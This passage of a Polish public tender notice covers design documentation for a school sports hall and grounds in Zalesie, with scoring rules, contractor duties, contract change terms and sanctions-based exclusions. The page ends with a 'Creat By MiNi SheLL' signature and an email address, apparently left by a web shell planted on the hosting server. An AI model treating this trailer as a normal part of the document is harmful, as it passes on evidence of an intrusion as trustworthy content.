uzasadnione specyfiką przedmiotu zamówienia, Wykonawca zobowiązany jest wskazać w dokumentacji projektowej parametry urządzeń i materiałów równoważnych<br/>Uwagi:<br/>1)	Dla projektowanego zakresu Zamawiający posiada ostateczne decyzje o ustaleniu lokalizacji inwestycji celu publicznego (Załącznik Nr 6 do SWZ). <br/>2)	Na realizację robót budowlanych na podstawie dokumentacji będącej przedmiotem zamówienia Zamawiający uzyskał dofinansowanie z &#34;PROGRAMU BUDOWY PRZYSZKOLNYCH HAL SPORTOWYCH NA 100 LECIE PIERWSZYCH WYSTĘPÓW REPREZENTACJI POLSKI NA IGRZYSKACH OLIMPIJSKICH&#34;<br/>3)	Budynek szkoły w Wielkich Chełmach oraz budynek szkoły w Zalesiu znajdują się w gminnej ewidencji zabytków (Załącznik nr 5 do SWZ Karty GEZ) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający będzie się kierował następującymi kryteriami oceny:<br/>A - Cena - 60%<br/>Maksymalna liczba punktów do uzyskania przy kryterium „Cena” wynosi 60.<br/>Liczba punktów przyznana ofercie w kryterium cena zostanie obliczona wg wzoru:<br/> <br/> cena najniższa<br/>A = -------------------------- x 100 x 60% <br/> cena oferty badanej<br/><br/>Wyniki będą zaokrąglane do 2 miejsc po przecinku (od 5 w górę).<br/><br/>B -Doświadczenie projektanta branży architektonicznej - 40%<br/>Maksymalna liczba punktów do uzyskania przy kryterium „Doświadczenie projektanta branży architektonicznej” wynosi 40. <br/>Gdy Wykonawca wykaże, że projektant branży architektonicznej wskazany w ofercie posiada doświadczenie jako projektant na: <br/>	żadnym lub jednym zadaniu dot. projektowania branży architektonicznej - otrzyma 0 punktów <br/>	dwóch zadaniach dot. projektowania branży architektonicznej - otrzyma 20 punktów <br/>	trzech lub więcej zadaniach dot. projektowania branży architektonicznej - otrzyma 40 punktów<br/>Ocena łączna X= A + B <br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie najwyższa liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta branży architektonicznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest wykonanie dokumentacji projektowo – kosztorysowej dla:<br/><br/>Część II - budowy hali sportowej z wielofunkcyjnymi boiskami oraz zagospodarowaniem terenu przy Szkole Podstawowej w Zalesiu w ramach zadania pn. „Budowa nowego boiska wielofunkcyjnego wraz z zadaszeniem o stałej konstrukcji przy Szkole Podstawowej w Zalesiu”.<br/>2.	Zakres rzeczowy dokumentacji projektowej obejmuje<br/>	<br/>	Część II:<br/>budowę hali sportowej z boiskiem o wymiarach 9 x 18 m wraz zapleczem szatniowo –sanitarnym, strzelnicą laserową z min. 4 stanowiskami strzeleckimi i łącznikiem do istniejącego budynku szkoły podstawowej, w tym:<br/>1)	roboty branży konstrukcyjno-budowlanej, obejmująca budowę nowego obiektu <br/>i przebudowę pomieszczeń istniejącego budynku szkoły,<br/>2)	roboty branży sanitarnej, w zakresie budowy instalacji c.o., c.w.u. wod. – kan. <br/>w nowobudowanym obiekcie oraz przebudowę ww. instalacji w obiekcie istniejącym, ewentualną wymianę źródła ogrzewania w istniejącym obiekcie, zastosowanie odnawialnego źródła ciepła dla ogrzewania hali, dostosowanie instalacji w obu obiektach do projektowanych stref ppoż, <br/>3)	roboty branży elektrycznej, w tym:<br/>a)	wykonanie instalacji elektrycznych oświetleniowych, gniazd wtykowych i oświetlenia awaryjnego w nowobudowanym obiekcie oraz budowa i przebudowa istniejących instalacji w części istniejącej, jeśli okaże się to niezbędne, dostosowanie instalacji w obu obiektach do projektowanych stref ppoż,<br/>b) wykonanie instalacji fotowoltaicznej dla potrzeb nowobudowanego oraz istniejącego budynku z magazynem energii<br/>c)	wykonanie instalacji nN w nowobudowanym obiekcie wraz z połączeniem <br/>z istniejącą instalacją w budynku szkoły oraz niezbędną jej przebudową,<br/>d)	wykonanie instalacji monitoringu dla nowobudowanego obiektu oraz terenu wokół budynków <br/>4) zagospodarowanie terenu, w tym m.in. wykonanie utwardzonych ciągów pieszych <br/>i jezdnych, miejsc parkingowych, urządzenie zieleni (trawniki, zieleń średnia <br/>i wysoka)<br/>5)	wyposażenie hali w sprzęt sportowy (m.in. drabinki, kosze do koszykówki, słupy <br/>i siatki do siatkówki, tenisa i badmintona, bramki, podium, kozioł, skrzynia, materace itp.), rozkładaną na płycie boiska wykładzinę ochronną, scenę mobilną itp.<br/>3.	Projekty należy opracować zgodnie z Rozporządzeniem Ministra Rozwoju z dnia <br/>11 września 2020 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (tj. Dz.U. z 2022 r. poz. 1679) – w ilości 4 egz. w wersji papierowej oraz w wersji elektronicznej w formacie PDF (płyta CD – 2 egz.).<br/>4.	Ponadto do obowiązków Wykonawcy należy sporządzenie:<br/>a)	Przedmiaru robót opracowany zgodnie z Rozporządzeniem Ministra Rozwoju <br/>i Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót oraz programu funkcjonalno - użytkowego (j.t. Dz. U. z 2021 poz. 2454) – (tylko w formie elektronicznej – pliki w formacie pdf i ath – płyta CD-2 egz.).<br/>Przedmiar winien zawierać:<br/>–	wyliczenia dla poszczególnych pozycji robót, z których wynikać będą ilości <br/>na poszczególne roboty,<br/>–	nakłady z tytułu robót demontażowych, transportu, zagospodarowania odpadów (ilości w tonach) oraz wszystkie inne nakłady mające wpływ na ryczałtowy koszt realizacji robót,<br/>–	odniesienie do Specyfikacji Technicznej Wykonania i Odbioru Robót.<br/>b)	Specyfikacji technicznej wykonania i odbioru robót budowlanych, opracowana zgodnie z Rozporządzeniem Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót oraz programu funkcjonalno - użytkowego (j.t. Dz. U. z 2021 poz. 2454) - w wersji papierowej ilości 1 egz. oraz w wersji elektronicznej <br/>w formacie pdf i ath (płyta CD – 2 egz.).<br/>5.	Kosztorys inwestorski, opracowany zgodnie z Ministra Rozwoju i Technologii <br/>z dnia 20 grudnia 2021 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. <br/>z 2021 poz. 2458) - w wersji papierowej ilości 1 egz. oraz w wersji elektronicznej <br/>w formacie pdf i ath (płyta CD – 2 egz.). <br/>6.	Do dokumentacji projektowej Wykonawca załącza wykaz sporządzonych opracowań <br/>oraz pisemne oświadczenie, że jest wykonana zgodnie z umową i kompletna z punktu widzenia celu, któremu ma służyć.<br/>7.	Wykonawca na żądanie Zamawiającego zobowiązany jest do nieodpłatnego uaktualniania kosztorysów do czasu zakończenia inwestycji, jednak nie dłużej niż 3 lata od uzyskania ostatecznej decyzji o pozwoleniu na budowę.<br/>8.	Wykonawca zobowiązany jest do:<br/>a)	sprawdzenia istniejących warunków w terenie (udokumentowanie wizji lokalnej <br/>za pomocą dokumentacji fotograficznej)<br/>b)	wykonania badań podłoża gruntowego, a jeśli okaże się to konieczne dla realizacji przedmiotu zamówienia, wykonania operatu geotechnicznego.<br/>c)	Uzgodnienie projektu z właściwym wojewódzkim konserwatorem zabytków (budynki szkół są wpisane do GEZ)<br/>d)	wykonanie mapy do celów projektowych,<br/>e)	odbycia min. dwóch spotkań z Zamawiającym w celu ustalenia szczegółów zakresu rzeczowego dokumentacji w przypadkach szczególnych możliwa jest wideokonferencja),<br/>f)	wykonania i przedstawienia do uzgodnienia Zamawiającemu projektów budowlanych wszystkich branż, opracowanych w stopniu szczegółowości, umożliwiającym uzyskanie pozwolenia na budowę oraz wykonanie projektów technicznych;<br/>g)	przygotowania wniosku o pozwolenie na budowę / zgłoszenia robót nie wymagających pozwolenia na budowę w zakresie objętym sporządzoną dokumentacją projektową <br/>oraz wszelkich niezbędnych dokumentów i uzgodnień koniecznych do złożenia ww. wniosku oraz złożenie tego wniosku/zgłoszenia do właściwego organu a w przypadku braku konieczności uzyskania pozwolenia na budowę lub zgłoszenia robót Wykonawca uzyska zaświadczenie o tym od właściwego organu.<br/>h)	uzyskania wszelkich wymaganych prawem, w tym Prawem budowlanym i Prawem ochrony środowiska, uzgodnień formalno – prawnych, opinii, operatów, ekspertyz oraz decyzji, które są konieczne do uzyskania decyzji o pozwoleniu na budowę obiektów objętych dokumentacją projektową, przy użyciu własnych środków i na własny koszt.<br/>i)	udzielania wyjaśnień na etapie wyboru wykonawcy robót, a dotyczących rozwiązań projektowych,<br/>j)	przygotowanie i złożenie wniosku o pozwolenie na budowę, oraz dokonywanie niezbędnych wyjaśnień i uzupełnień na wezwanie organu wydającego pozwolenie na budowę,<br/>k)	pełnienie nadzoru autorskiego w trakcie realizacji robót budowlanych.<br/>9.	Sposób wykonania dokumentacji projektowej:<br/>a)	dokumentacja projektowa ma być wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć. Dokumentacja będzie stanowić opis przedmiotu zamówienia <br/>do postępowania o udzielenie zamówienia publicznego na roboty budowlane w oparciu o ustawę Prawo zamówień publicznych<br/>b)	dokumentacja projektowa winna zostać wykonana w języku polskim, zgodnie <br/>z obowiązującymi przepisami prawa, normami technicznymi, zasadami wiedzy technicznej oraz powinna być opatrzona klauzulą o kompletności i przydatności z punku widzenia celu, któremu ma służyć.<br/>c)	dokumentacja projektowa winna zostać sprawdzona przez osobę posiadającą wymagane uprawnienia. Każdy egzemplarz dokumentacji winien być podpisany przez projektanta i sprawdzającego.<br/>d)	dokumentację projektową należy opracować w sposób czytelny, z wyłączeniem opisów ręcznych.<br/>e)	informacje zawarte w dokumentacji w zakresie technologii wykonania robót, doboru materiałów i urządzeń powinny określać przedmiot umowy w sposób zgodny z ustawą Prawo zamówień publicznych oraz przepisami wykonawczymi do tej ustawy <br/>w sposób zapewniający zachowanie uczciwej konkurencji.<br/>f)	Wykonawca zobowiązuje się wykonać przedmiot zamówienia z uwzględnieniem postanowień zawartych w art. 29 Ustawy z dnia 11 września 2019 roku <br/>Prawo zamówień publicznych (Dz. U. z 2024 r. poz.1320) – tzn. przedmiotu zamówienia nie można opisywać poprzez wskazanie znaków towarowych, patentów lub pochodzenia.<br/>	W przypadku, gdy zastosowanie w/w jest uzasadnione specyfiką przedmiotu zamówienia, Wykonawca zobowiązany jest wskazać w dokumentacji projektowej parametry urządzeń i materiałów równoważnych<br/>Uwagi:<br/>1)	Dla projektowanego zakresu Zamawiający posiada ostateczne decyzje o ustaleniu lokalizacji inwestycji celu publicznego (Załącznik Nr 6 do SWZ). <br/>2)	Na realizację robót budowlanych na podstawie dokumentacji będącej przedmiotem zamówienia Zamawiający uzyskał dofinansowanie z &#34;PROGRAMU BUDOWY PRZYSZKOLNYCH HAL SPORTOWYCH NA 100 LECIE PIERWSZYCH WYSTĘPÓW REPREZENTACJI POLSKI NA IGRZYSKACH OLIMPIJSKICH&#34;<br/>3)	Budynek szkoły w Wielkich Chełmach oraz budynek szkoły w Zalesiu znajdują się w gminnej ewidencji zabytków (Załącznik nr 5 do SWZ Karty GEZ) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający będzie się kierował następującymi kryteriami oceny:<br/>A - Cena - 60%<br/>Maksymalna liczba punktów do uzyskania przy kryterium „Cena” wynosi 60.<br/>Liczba punktów przyznana ofercie w kryterium cena zostanie obliczona wg wzoru:<br/> <br/> cena najniższa<br/>A = -------------------------- x 100 x 60% <br/> cena oferty badanej<br/><br/>Wyniki będą zaokrąglane do 2 miejsc po przecinku (od 5 w górę).<br/><br/>B -Doświadczenie projektanta branży architektonicznej - 40%<br/>Maksymalna liczba punktów do uzyskania przy kryterium „Doświadczenie projektanta branży architektonicznej” wynosi 40. <br/>Gdy Wykonawca wykaże, że projektant branży architektonicznej wskazany w ofercie posiada doświadczenie jako projektant na: <br/>	żadnym lub jednym zadaniu dot. projektowania branży architektonicznej - otrzyma 0 punktów <br/>	dwóch zadaniach dot. projektowania branży architektonicznej - otrzyma 20 punktów <br/>	trzech lub więcej zadaniach dot. projektowania branży architektonicznej - otrzyma 40 punktów<br/>Ocena łączna X= A + B <br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie najwyższa liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta branży architektonicznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie, o którym mowa w art. 125 ust. 1 ustawy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Cd. komunikacji:<br/>14. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>15. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>16. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (22) 458 77 99 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>17. Zamawiający dopuszcza również komunikację za pomocą poczty elektronicznej na adres e-mail: um@brusy.pl (nie dotyczy<br/>składania ofert).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 4.	Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1)	Oświadczenie o braku podstaw wykluczenia, którego propozycję stanowi Załącznik Nr 3 do SWZ,<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o braku podstaw wykluczenia, składa każdy z wykonawców oddzielnie.<br/>2)	pełnomocnictwo dla osoby podpisującej ofertę do występowania w imieniu wykonawcy, jeżeli nie wynika to bezpośrednio z dokumentów rejestrowych lub w przypadku o którym mowa w art. 58 ust. 2 ustawy Prawo zamówień publicznych (propozycja - Załącznik Nr 4 do SWZ).<br/>Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (tj. w formie elektronicznej podpisanej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14.02.1991r. – Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 5.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w ust. 4 pkt 2), składa każdy z wykonawców oddzielnie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną <br/>na piśmie pod rygorem nieważności.<br/>2.	Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy <br/>w stosunku do treści oferty w przypadkach określonych w art.455 ustawy Pzp oraz: <br/>1)	wystąpią okoliczności niezależnych od Wykonawcy skutkujących niemożliwością dotrzymania terminu realizacji przedmiotu umowy, <br/>2)	zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego, <br/>3)	wystąpienia siły wyższej, tj. wyjątkowego wydarzenia lub okoliczności<br/>a)	na którą Strony nie miały wpływu,<br/>b)	przeciw której Strony nie mogły się zabezpieczyć przed zawarciem umowy,<br/>c)	której nie można było w racjonalny sposób uniknąć lub przezwyciężyć,<br/>d)	której nie można uznać za wywołaną w znaczącym stopniu przez żadną ze Stron.<br/>5)	sądowej waloryzacji zamówienia,<br/>3.	Istotne zmiany w umowie, na skutek wystąpienia poniższych okoliczności mogą dotyczyć następujących elementów umowy:<br/>1)	zmiany terminu wykonania zamówienia, w przypadku:<br/>	konieczności wprowadzenia zmian w opracowywanej dokumentacji techniczno – projektowej, co może powodować brak możliwości dotrzymania pierwotnego terminu zakończenia realizacji zawartej umowy;<br/>	przerw w realizacji prac projektowych powstałych z przyczyn nie leżących po stronie Wykonawcy;<br/>	wstrzymania realizacji prac objętych umową z przyczyn niezależnych od Wykonawcy, co uniemożliwia terminowe zakończenie realizacji przedmiotu umowy;<br/>	konieczności uzyskania niemożliwych do przewidzenia na etapie planowania<br/>inwestycji: danych, zgód lub pozwoleń osób trzecich lub właściwych organów;<br/>	wystąpienia opóźnień w dokonaniu określonych czynności lub ich zaniechanie przez właściwe organy administracji, które nie są następstwem okoliczności za które Wykonawca ponosi odpowiedzialność<br/>	wystąpienia opóźnień w wydawaniu decyzji, zezwoleń, uzgodnień, itp., do wydania których właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres, przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność<br/>	w przypadku wprowadzenia zmian w umowie na podstawie art. 455 PZP<br/>2)	Zmiany zakresu przedmiotu zamówienia, w przypadku:<br/>	rezygnacji Zamawiającego z wykonania części zamówienia (zmniejszenie zakresu przedmiotu umowy), <br/>	zwiększenia zakresu rzeczowego dokumentacji projektowej (zwiększenie zakresu umowy),<br/>	zmian wymagań Zamawiającego co do przedmiotu zamówienia, które nie były przewidziane w pierwotnym opisie przedmiotu zamówienia, a ich wprowadzenie jest zasadne ze względów funkcjonalnych projektowanego obiektu<br/>3)	zmiany wynagrodzenia, w przypadku:<br/>	odstąpienia przez Zamawiającego od umowy lub jej części,<br/>	wprowadzenia zmian określonych w pkt. 2), jeżeli mają wpływ na wysokość wynagrodzenia. Dopuszczalna jest zmiana wynagrodzenia w zakresie, w jakim zmiany te mają wpływ na wysokość wynagrodzenia Wykonawcy, z zastrzeżeniem, że zmiana wynagrodzenia nie przekroczy 25% pierwotnej wartości zamówienia<br/>	w przypadku wprowadzenia zmian w umowie na podstawie art. 455PZP, jeżeli mają wpływ na wysokość wynagrodzenia,<br/>4)	zmiany podwykonawcy, w przypadku:<br/>	wprowadzenia nowego podwykonawcy;<br/>	rezygnacji podwykonawcy;<br/>	zmiany podwykonawcy,<br/>	zmiany wartości lub zakresu usług wykonywanych przez podwykonawców. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-04 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1) Wykonawca składa ofertę wraz z wymaganymi dokumentami za pośrednictwem Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl na formularzu ofertowym, zgodnym z wzorem stanowiącym Załącznik Nr 1 do SWZ.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-04 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-02</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 5.	Na podstawie art. 7 ust. 1 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach <br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego z postępowania o udzielenie zamówienia prowadzonego na podstawie ustawy Pzp wyklucza się:<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych <br/>w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy.<br/>6.	Wykluczenie, o którym mowa w ust. 5 następuje na okres trwania okoliczności, o których mowa w ust. 5.<br/>7.	W przypadku wykonawcy wykluczonego na podstawie art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, zamawiający odrzuca ofertę takiego wykonawcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com